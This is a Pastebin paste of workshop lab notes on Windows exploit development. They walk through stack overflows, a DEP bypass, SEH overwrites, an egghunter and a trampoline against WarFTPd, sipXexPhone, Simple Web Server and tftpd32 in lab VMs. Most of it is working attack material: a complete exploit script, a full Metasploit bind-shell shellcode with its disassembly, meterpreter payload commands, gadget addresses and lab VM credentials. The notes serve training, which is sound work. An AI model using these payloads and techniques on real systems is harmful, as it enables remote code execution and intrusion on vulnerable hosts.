Advertisement
joemccray

Quick Exploit Dev

Sep 16th, 2015
1,580
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.11 KB | None | 0 0
  1. #####################################
  2. # Quick Stack Based Buffer Overflow #
  3. #####################################
  4.  
  5. - You can download everything you need for this exercise (except netcat) from the link below
  6. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  7.  
  8. - Extract this zip file to your Desktop
  9.  
  10. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  11.  
  12. - Open a new command prompt and type:
  13. nc localhost 9999
  14.  
  15. - In the new command prompt window where you ran nc type:
  16. HELP
  17.  
  18. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  19. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  20.  
  21. - Now double-click on 1-simplefuzzer.py
  22. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  23.  
  24.  
  25. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  26.  
  27. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  28.  
  29. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  30.  
  31. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  32.  
  33. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  34.  
  35. - Calculate the distance to EIP by running script 3-3000chars.py
  36. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  37.  
  38. 4-count-chars-to-EIP.py
  39. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  40. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  41.  
  42. 5-2006char-eip-check.py
  43. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  44.  
  45. 6-jmp-esp.py
  46. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  47.  
  48. 7-first-exploit
  49. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  50.  
  51. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  52.  
  53.  
  54. ------------------------------
  55.  
  56. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  57.  
  58. vi vulnserv.rb (paste the code into this file)
  59.  
  60.  
  61.  
  62. cd ~/toolz/metasploit
  63.  
  64. ./msfconsole
  65.  
  66.  
  67.  
  68. use exploit/windows/misc/vulnserv
  69. set PAYLOAD windows/meterpreter/bind_tcp
  70. set RHOST 192.168.88.129
  71. set RPORT 9999
  72. exploit
  73.  
  74.  
  75.  
  76.  
  77.  
  78. You can download the Exploit Dev VMs from the links below:
  79. https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
  80. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
  81. user: Administrator
  82. pass: strategicsec
  83.  
  84. https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-ED-MSF.zip
  85. user: strategicsec
  86. pass: strategicsec
  87.  
  88.  
  89.  
  90.  
  91. cd /home/strategicsec/toolz/metasploit
  92. mkdir DLLs
  93. cd DLLs
  94. wget https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/DLLs.zip
  95. unzip DLLs.zip
  96.  
  97. ###########################
  98. # Lab 1a: Stack Overflows #
  99. ###########################
  100.  
  101. #################################
  102. # Start WarFTPd #
  103. # Start WinDBG #
  104. # Press F6 #
  105. # Attach to war-ftpd.exe #
  106. #################################
  107. Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
  108. https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip
  109.  
  110.  
  111.  
  112. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
  113.  
  114.  
  115. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  116.  
  117. At WINDBG prompt
  118. “r” to show registers or “alt+4”
  119.  
  120. dd esp
  121.  
  122.  
  123. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  124.  
  125.  
  126. At WINDBG prompt
  127. “r” to show registers or “alt+4”
  128. dd esp
  129.  
  130. Eip: 32714131
  131. esp: affd58 (71413471)
  132.  
  133. Now we need to SSH into the StrategicSec Ubuntu host
  134.  
  135. cd /home/strategicsec/toolz/metasploit/tools
  136.  
  137. ruby pattern_offset.rb 32714131
  138. 485
  139.  
  140. ruby pattern_offset.rb 71413471
  141. 493
  142.  
  143. Distance to EIP is: 485
  144. Relative position of ESP is: 493
  145.  
  146. RET – POP EIP
  147. RET 4 – POP EIP and shift ESP down by 4 bytes
  148.  
  149. cd /home/strategicsec/toolz/metasploit/
  150. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  151.  
  152. 0x7c9c167d push esp; retn 0x304d
  153. 0x7c9d30d7 jmp esp < - how about we use this one
  154. 0x7c9d30eb jmp esp
  155. 0x7c9d30ff jmp esp
  156.  
  157.  
  158. warftpd3.py with Notepad++
  159. Fill in the appropriate values
  160. Distance to EIP
  161. Address of JMP ESP
  162.  
  163.  
  164.  
  165. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  166.  
  167. 0:003> dd eip
  168. 0:003> dd esp
  169.  
  170.  
  171.  
  172.  
  173.  
  174. Mention bad characters
  175. No debugger
  176.  
  177.  
  178.  
  179. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  180.  
  181. nc XPSP3-ED-Target-IP 4444
  182.  
  183.  
  184.  
  185. ###########################################
  186. # Lab 1b: Stack Overflows with DEP Bypass #
  187. ###########################################
  188.  
  189. Reboot your target host and choose the "2nd" option for DEP.
  190.  
  191.  
  192. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  193.  
  194.  
  195.  
  196. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  197.  
  198. At WINDBG prompt
  199. “r” to show registers or “alt+4”
  200.  
  201. dd esp
  202.  
  203.  
  204.  
  205.  
  206. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  207.  
  208.  
  209. At WINDBG prompt
  210. “r” to show registers or “alt+4”
  211. dd esp
  212.  
  213. Eip: 32714131
  214. esp: affd58 (71413471)
  215.  
  216. Now we need to SSH into the StrategicSec Ubuntu host
  217.  
  218. cd /home/strategicsec/toolz/metasploit/tools
  219.  
  220. ruby pattern_offset.rb 32714131
  221. 485
  222.  
  223. ruby pattern_offset.rb 71413471
  224. 493
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233. cd /home/strategicsec/toolz/metasploit/tools
  234.  
  235. ruby pattern_offset.rb 32714131
  236.  
  237. cd /home/strategicsec/toolz/metasploit/
  238.  
  239. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  240.  
  241.  
  242.  
  243. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  244.  
  245. 0:003> dd eip
  246. 0:003> dd esp
  247.  
  248. INT3s - GOOD!!!!!!!
  249.  
  250.  
  251.  
  252. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  253.  
  254. nc XPSP3-ED-Target-IP 4444
  255.  
  256.  
  257. strategicsec....exploit no workie!!!!
  258.  
  259.  
  260. Why????????? DEP!!!!!!!!!!!!!
  261.  
  262.  
  263.  
  264.  
  265. Let's look through ole32.dll for the following instructions:
  266.  
  267. mov al,0x1
  268. ret 0x4
  269.  
  270. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  271.  
  272.  
  273.  
  274. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  275.  
  276. [DLLs/xpsp3/ole32.dll]
  277. 0x775ee00e b001c204
  278. 0x775ee00e mov al, 1
  279. 0x775ee010 ret 4
  280.  
  281.  
  282. Then we need to jump to the LdrpCheckNXCompatibility routine in
  283. ntdll.dll that disables DEP.
  284.  
  285.  
  286.  
  287. Inside of ntdll.dll we need to find the following instructions:
  288.  
  289. CMP AL,1
  290. PUSH 2
  291. POP ESI
  292. JE ntdll.7
  293.  
  294.  
  295.  
  296. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  297.  
  298. [DLLs/xpsp3/ntdll.dll]
  299. 0x7c91cd24 3c016a025e0f84
  300. 0x7c91cd24 cmp al, 1
  301. 0x7c91cd26 push 2
  302. 0x7c91cd28 pop esi
  303. 0x7c91cd29 jz 7
  304.  
  305.  
  306. This set of instructions makes sure that AL is set to 1, 2 is pushed
  307. on the stack then popped into ESI.
  308.  
  309.  
  310.  
  311.  
  312.  
  313. dep = "\x0e\xe0\x5e\x77"+\
  314. "\xff\xff\xff\xff"+\
  315. "\x24\xcd\x91\x7c"+\
  316. "\xff\xff\xff\xff"+\
  317. "A"*0x54
  318.  
  319.  
  320.  
  321. #################################
  322. # Start WarFTPd #
  323. # Start WinDBG #
  324. # Press F6 #
  325. # Attach to war-ftpd.exe #
  326. # bp 0x775ee00e #
  327. # g #
  328. #################################
  329.  
  330.  
  331.  
  332.  
  333. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  334.  
  335. ---------------------------------------------------------------------------
  336. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  337.  
  338. mov al,0x1
  339. ret 0x4
  340.  
  341.  
  342.  
  343.  
  344. 0:005> g
  345. Breakpoint 0 hit
  346. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  347. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  348. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  349. ole32!CSSMappedStream::IsWriteable:
  350. 775ee00e b001 mov al,1
  351.  
  352.  
  353. 0:001> t
  354. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  355. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  356. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  357. ole32!CSSMappedStream::IsWriteable+0x2:
  358. 775ee010 c20400 ret 4
  359.  
  360.  
  361.  
  362.  
  363.  
  364. ---------------------------------------------------------------------------
  365. Ok, so inside of ntdll.dll we need to find the following instructions:
  366.  
  367. CMP AL,1
  368. PUSH 2
  369. POP ESI
  370. JE ntdll.7
  371.  
  372. 0:001> t
  373. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  374. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  375. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  376. ntdll!LdrpCheckNXCompatibility+0x13:
  377. 7c91cd24 3c01 cmp al,1
  378.  
  379.  
  380. 0:001> t
  381. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  382. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  383. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  384. ntdll!LdrpCheckNXCompatibility+0x15:
  385. 7c91cd26 6a02 push 2
  386.  
  387.  
  388. 0:001> t
  389. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  390. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  391. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  392. ntdll!LdrpCheckNXCompatibility+0x17:
  393. 7c91cd28 5e pop esi
  394.  
  395.  
  396. 0:001> t
  397. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  398. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  399. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  400. ntdll!LdrpCheckNXCompatibility+0x18:
  401. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  402.  
  403.  
  404. ---------------------------------------------------------------------------
  405.  
  406.  
  407.  
  408. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  409.  
  410. nc XPSP3-ED-Target-IP 4444
  411.  
  412.  
  413. ##########################
  414. # Lab 1c: SEH Overwrites #
  415. ##########################
  416.  
  417. #################################################
  418. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  419. # Start sipXexPhone if it isn’t already running #
  420. # Start WinDBG #
  421. # Press “F6” and Attach to sipXexPhone.exe #
  422. # Press “F5” to start the debugger #
  423. #################################################
  424.  
  425.  
  426. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  427.  
  428.  
  429.  
  430. python sipex0.py XPSP3-ED-Target-IP
  431.  
  432. 0:003> !exchain
  433. 0:003> dds esp
  434. 0:003> dds
  435.  
  436. python sipex1.py XPSP3-ED-Target-IP
  437.  
  438. 0:003> !exchain
  439. 0:003> g
  440.  
  441. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  442.  
  443.  
  444. python sipex2.py XPSP3-ED-Target-IP
  445.  
  446. 0:003> !exchain
  447. 0:003> g
  448.  
  449.  
  450. ***ssh into instructor Ubuntu host***
  451. cd /home/strategicsec/toolz/metasploit/tools
  452. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  453.  
  454.  
  455.  
  456. !load narly
  457. !nmod
  458.  
  459. ***ssh into instructor Ubuntu host***
  460. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  461. cd /home/strategicsec/toolz/metasploit/
  462. ./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  463.  
  464.  
  465. #########################################
  466. # sipex3.py in Notepad++. #
  467. # Set cseq = 252 #
  468. # Set seh2 address to: 0x10015977 #
  469. #########################################
  470.  
  471.  
  472. python sipex3.py XPSP3-ED-Target-IP
  473. 0:003> !exchain
  474.  
  475. python sipex4.py XPSP3-ED-Target-IP
  476.  
  477.  
  478.  
  479. nc XPSP3-ED-Target-IP 4444
  480.  
  481.  
  482.  
  483.  
  484.  
  485. Brush up on the basics of Structured Exception Handlers:
  486. http://www.securitytube.net/video/1406
  487. http://www.securitytube.net/video/1407
  488. http://www.securitytube.net/video/1408
  489.  
  490.  
  491.  
  492.  
  493. Here are the slides for the exploit dev basics:
  494. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
  495. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
  496. https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
  497.  
  498.  
  499. Here are the exploit dev basic videos:
  500. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
  501. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
  502. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
  503. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
  504. https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
  505.  
  506.  
  507.  
  508. Recommended videos on Structured Exception Handling:
  509. http://www.securitytube.net/video/1406
  510. http://www.securitytube.net/video/1407
  511. http://www.securitytube.net/video/1408
  512.  
  513.  
  514. ########################################
  515. # Lab 2a: Not Enough Space (Egghunter) #
  516. ########################################
  517.  
  518. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
  519.  
  520. SWS - SIMPLE WEB SERVER
  521. -----------------------
  522.  
  523. Running SWS on Strategicsec-XP-ED-Target-VM
  524. Start > Programs > Simple Web Server (it's in the middle somewhere)
  525. Red icon in system tray
  526. Double click it
  527. - it will pop up a menu
  528. - select "start"
  529. - dialog box shows starting params - port 82
  530.  
  531. WinDBG
  532. - attach to "server.exe"
  533.  
  534.  
  535. python sws1.py | nc XPSP3-ED-Target-IP 82
  536.  
  537.  
  538.  
  539. python sws2.py | nc XPSP3-ED-Target-IP 82
  540.  
  541.  
  542. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  543. cd /home/strategicsec/toolz/metasploit/tools
  544. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  545. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  546.  
  547.  
  548.  
  549.  
  550.  
  551.  
  552.  
  553.  
  554. EGGHUNTER:
  555. ----------
  556.  
  557. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  558. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  559. ^^^^^^^^^^^^^^^^
  560. ABBA
  561. JMP ESP
  562. /
  563. /
  564. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  565. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  566.  
  567.  
  568.  
  569.  
  570. -----sws3.py-----
  571. #!/usr/bin/python2
  572.  
  573. import os # for output setting
  574. import sys
  575. import struct # for pack function
  576.  
  577. # turn off output buffer and set binary mode
  578. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  579.  
  580.  
  581. pad = "A" * 225 # distance to EIP
  582. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  583.  
  584. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  585. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  586.  
  587. shellcode = "\xCC" * 700
  588.  
  589. buf = "GET /"
  590. buf += pad + struct.pack('<I', eip) + egghunter
  591. buf += " HTTP/1.0\r\n"
  592. buf += "User-Agent: ABBAABBA"
  593. buf += shellcode
  594. buf += " HTTP/1.0\r\n"
  595.  
  596. sys.stdout.write(buf)
  597. -----
  598.  
  599. ############################################
  600. # Lab 2b: Not Enough Space (Negative Jump) #
  601. ############################################
  602.  
  603. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  604.  
  605.  
  606. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  607.  
  608. ^
  609. 1 ----------------------1 overflow the buffer---------------------------|
  610.  
  611. ^ ^
  612. |
  613. 2 ----jump over seh record---|
  614.  
  615. ^ ^
  616. |
  617. 3--POP 2 words off stack---|
  618.  
  619. ^
  620. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
  621.  
  622.  
  623. #########################################
  624. # Lab 2c: Not Enough Space (Trampoline) #
  625. #########################################
  626.  
  627. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  628. On the Strategicsec-XP-ED-Target-VM VM
  629.  
  630. - open a command prompt
  631. - c:\software\tftpd32
  632. - run tftpd32.exe
  633. - UDP port 69
  634. (socket code is already in the scripts)
  635.  
  636.  
  637.  
  638.  
  639. On your attack host please install:
  640.  
  641.  
  642. NASM - Netwide Assembler
  643.  
  644.  
  645.  
  646.  
  647.  
  648. -----------------------------------------------------------------------------------------------------------------
  649.  
  650.  
  651. We want to generate the shellcode (BIND SHELL on Port 4444)
  652. - No restricted characters
  653. - Encoder: NONE
  654.  
  655. Create a Python file called dumpshellcode.py
  656.  
  657. ---
  658. #!/usr/bin/python2
  659.  
  660. import os
  661. import sys
  662. import struct
  663.  
  664.  
  665. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  666. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  667. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  668. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  669. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  670. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  671. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  672. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  673. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  674. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  675. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  676. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  677. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  678. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  679. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  680. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  681. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  682. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  683. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  684. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  685. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  686.  
  687. sys.stdout.write(shellcode)
  688. ---
  689.  
  690.  
  691.  
  692. python dumpshell.py > bindshell.bin
  693.  
  694. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
  695.  
  696.  
  697.  
  698. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  699. 317 bindshell.bin
  700.  
  701. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  702. 00000000 FC cld
  703. 00000001 6AEB push byte -0x15
  704. 00000003 4D dec ebp
  705. 00000004 E8F9FFFFFF call dword 0x2
  706. 00000009 60 pushad
  707. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  708. 0000000E 8B453C mov eax,[ebp+0x3c]
  709. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  710. 00000015 01EF add edi,ebp
  711. 00000017 8B4F18 mov ecx,[edi+0x18]
  712. 0000001A 8B5F20 mov ebx,[edi+0x20]
  713. 0000001D 01EB add ebx,ebp
  714. 0000001F 49 dec ecx
  715. 00000020 8B348B mov esi,[ebx+ecx*4]
  716. 00000023 01EE add esi,ebp
  717. 00000025 31C0 xor eax,eax
  718. 00000027 99 cdq
  719. 00000028 AC lodsb
  720. 00000029 84C0 test al,al
  721. 0000002B 7407 jz 0x34
  722. 0000002D C1CA0D ror edx,0xd
  723. 00000030 01C2 add edx,eax
  724. 00000032 EBF4 jmp short 0x28
  725. 00000034 3B542428 cmp edx,[esp+0x28]
  726. 00000038 75E5 jnz 0x1f
  727. 0000003A 8B5F24 mov ebx,[edi+0x24]
  728. 0000003D 01EB add ebx,ebp
  729. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  730. 00000043 8B5F1C mov ebx,[edi+0x1c]
  731. 00000046 01EB add ebx,ebp
  732. 00000048 032C8B add ebp,[ebx+ecx*4]
  733. 0000004B 896C241C mov [esp+0x1c],ebp
  734. 0000004F 61 popad
  735. 00000050 C3 ret
  736. 00000051 31DB xor ebx,ebx
  737. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  738. 00000057 8B400C mov eax,[eax+0xc]
  739. 0000005A 8B701C mov esi,[eax+0x1c]
  740. 0000005D AD lodsd
  741. 0000005E 8B4008 mov eax,[eax+0x8]
  742. 00000061 5E pop esi
  743. 00000062 688E4E0EEC push dword 0xec0e4e8e
  744. 00000067 50 push eax
  745. 00000068 FFD6 call esi
  746. 0000006A 6653 push bx
  747. 0000006C 66683332 push word 0x3233
  748. 00000070 687773325F push dword 0x5f327377
  749. 00000075 54 push esp
  750. 00000076 FFD0 call eax
  751. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  752. 0000007D 50 push eax
  753. 0000007E FFD6 call esi PART 1
  754. 00000080 5F pop edi
  755. 00000081 89E5 mov ebp,esp
  756. 00000083 6681ED0802 sub bp,0x208
  757. 00000088 55 push ebp
  758. 00000089 6A02 push byte +0x2
  759. 0000008B FFD0 call eax
  760. 0000008D 68D909F5AD push dword 0xadf509d9
  761. 00000092 57 push edi
  762. 00000093 FFD6 call esi
  763. 00000095 53 push ebx
  764. 00000096 53 push ebx
  765. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  766. 00000097 53 push ebx
  767. 00000098 53 push ebx
  768. 00000099 53 push ebx
  769. 0000009A 43 inc ebx
  770. 0000009B 53 push ebx
  771. 0000009C 43 inc ebx
  772. 0000009D 53 push ebx PART 2
  773. 0000009E FFD0 call eax
  774. 000000A0 6668115C push word 0x5c11
  775. 000000A4 6653 push bx
  776. 000000A6 89E1 mov ecx,esp
  777. 000000A8 95 xchg eax,ebp
  778. 000000A9 68A41A70C7 push dword 0xc7701aa4
  779. 000000AE 57 push edi
  780. 000000AF FFD6 call esi
  781. 000000B1 6A10 push byte +0x10
  782. 000000B3 51 push ecx
  783. 000000B4 55 push ebp
  784. 000000B5 FFD0 call eax
  785. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  786. 000000BC 57 push edi
  787. 000000BD FFD6 call esi
  788. 000000BF 53 push ebx
  789. 000000C0 55 push ebp
  790. 000000C1 FFD0 call eax
  791. 000000C3 68E5498649 push dword 0x498649e5
  792. 000000C8 57 push edi
  793. 000000C9 FFD6 call esi
  794. 000000CB 50 push eax
  795. 000000CC 54 push esp
  796. 000000CD 54 push esp
  797. 000000CE 55 push ebp
  798. 000000CF FFD0 call eax
  799. 000000D1 93 xchg eax,ebx
  800. 000000D2 68E779C679 push dword 0x79c679e7
  801. 000000D7 57 push edi
  802. 000000D8 FFD6 call esi
  803. 000000DA 55 push ebp
  804. 000000DB FFD0 call eax
  805. 000000DD 666A64 push word 0x64
  806. 000000E0 6668636D push word 0x6d63
  807. 000000E4 89E5 mov ebp,esp
  808. 000000E6 6A50 push byte +0x50
  809. 000000E8 59 pop ecx
  810. 000000E9 29CC sub esp,ecx
  811. 000000EB 89E7 mov edi,esp
  812. 000000ED 6A44 push byte +0x44
  813. 000000EF 89E2 mov edx,esp
  814. 000000F1 31C0 xor eax,eax
  815. 000000F3 F3AA rep stosb
  816. 000000F5 FE422D inc byte [edx+0x2d]
  817. 000000F8 FE422C inc byte [edx+0x2c]
  818. 000000FB 93 xchg eax,ebx
  819. 000000FC 8D7A38 lea edi,[edx+0x38]
  820. 000000FF AB stosd
  821. 00000100 AB stosd
  822. 00000101 AB stosd
  823. 00000102 6872FEB316 push dword 0x16b3fe72
  824. 00000107 FF7544 push dword [ebp+0x44]
  825. 0000010A FFD6 call esi
  826. 0000010C 5B pop ebx
  827. 0000010D 57 push edi
  828. 0000010E 52 push edx
  829. 0000010F 51 push ecx
  830. 00000110 51 push ecx
  831. 00000111 51 push ecx
  832. 00000112 6A01 push byte +0x1
  833. 00000114 51 push ecx
  834. 00000115 51 push ecx
  835. 00000116 55 push ebp
  836. 00000117 51 push ecx
  837. 00000118 FFD0 call eax
  838. 0000011A 68ADD905CE push dword 0xce05d9ad
  839. 0000011F 53 push ebx
  840. 00000120 FFD6 call esi
  841. 00000122 6AFF push byte -0x1
  842. 00000124 FF37 push dword [edi]
  843. 00000126 FFD0 call eax
  844. 00000128 8B57FC mov edx,[edi-0x4]
  845. 0000012B 83C464 add esp,byte +0x64
  846. 0000012E FFD6 call esi
  847. 00000130 52 push edx
  848. 00000131 FFD0 call eax
  849. 00000133 68F08A045F push dword 0x5f048af0
  850. 00000138 53 push ebx
  851. 00000139 FFD6 call esi
  852. 0000013B FFD0 call eax
  853.  
  854.  
  855.  
  856.  
  857. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
